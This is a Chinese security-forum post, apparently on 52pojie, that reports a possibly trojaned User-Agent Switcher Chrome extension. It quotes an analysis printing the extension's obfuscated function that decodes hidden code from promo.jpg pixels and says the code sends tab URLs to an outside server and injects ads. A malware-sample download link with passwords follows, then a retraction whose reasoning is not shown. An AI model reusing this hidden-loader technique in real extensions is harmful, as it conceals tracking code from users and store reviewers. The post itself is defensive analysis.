好友
阅读权限10
听众
最后登录1970-1-1
|
记忆孩子
发表于 2019-11-17 20:28
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 记忆孩子 于 2019-11-17 23:24 编辑
个人在网上下载 User-Agent Switcher 插件时 发现了可能带有木马的帖子
抱着论坛里大部分人都在使用的插件可能带有木马的心情,上传到病毒救援区。请大佬看看。
以下内容搬运 https://www.v2ex.com/t/389340?p=1 为了绕过 chrome 的审核策略,他把恶意代码隐藏在了 promo.jpg 里background.js 的第 80 行,从这个图片里解密出恶意代码并执行t.prototype.Vh = function(t, e) { if ("" === '../promo.jpg') return ""; void 0 === t && (t = '../promo.jpg'), t.length && (t = r.Wk(t)), e = e || {}; var n = this.ET, i = e.mp || n.mp, o = e.Tv || n.Tv, h = e.At || n.At, a = r.Yb(Math.pow(2, i)), f = (e.WC || n.WC, e.TY || n.TY), u = document.createElement("canvas"), p = u.getContext("2d"); if (u.style.display = "none", u.width = e.width || t.width, u.height = e.width || t.height, 0 === u.width || 0 === u.height) return ""; e.height && e.width ? p.drawImage(t, 0, 0, e.width, e.height) : p.drawImage(t, 0, 0); var c = p.getImageData(0, 0, u.width, u.height), d = c.data, g = []; if (c.data.every(function(t) { return 0 === t })) return ""; var m, s; if (1 === o) for (m = 3, s = !1; !s && m < d.length && !s; m += 4) s = f(d, m, o), s || g.push(d[m] - (255 - a + 1)); var v = "", w = 0, y = 0, l = Math.pow(2, h) - 1; for (m = 0; m < g.length; m += 1) w += g[m] << y, y += i, y >= h && (v += String.fromCharCode(w & l), y %= h, w = g[m] >> i - y); return v.length < 13 ? "" : (0 !== w && (v += String.fromCharCode(w & l)), v) }会把你打开的每个 tab 的 url 等信息加密发送到 https://uaswitcher.org/logic/page/data另外还会从 http://api.data-monitor.info/api/bhrule?sub=116 获取推广链接的规则,打开符合规则的网站时,会在页面插入广告甚至恶意代码.
链接: https://pan.baidu.com/s/1cUv4lfqeSpWe7yYgRuWdpw 提取码: 1cd5 解压码:52pojie
19楼的大佬已经给出了解释,大家放心用。 是我没有看清楚原贴的内容,感谢大佬的分析。我对不起大家,浪费了大家的时间,我给大家磕头了 。
好了 大家散了吧
|
免费评分
-
查看全部评分
|
发帖前要善用【论坛搜索】功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。 |
|
|
|
|
|
|
[复制链接]
|
发表于 2019-11-17 20:51
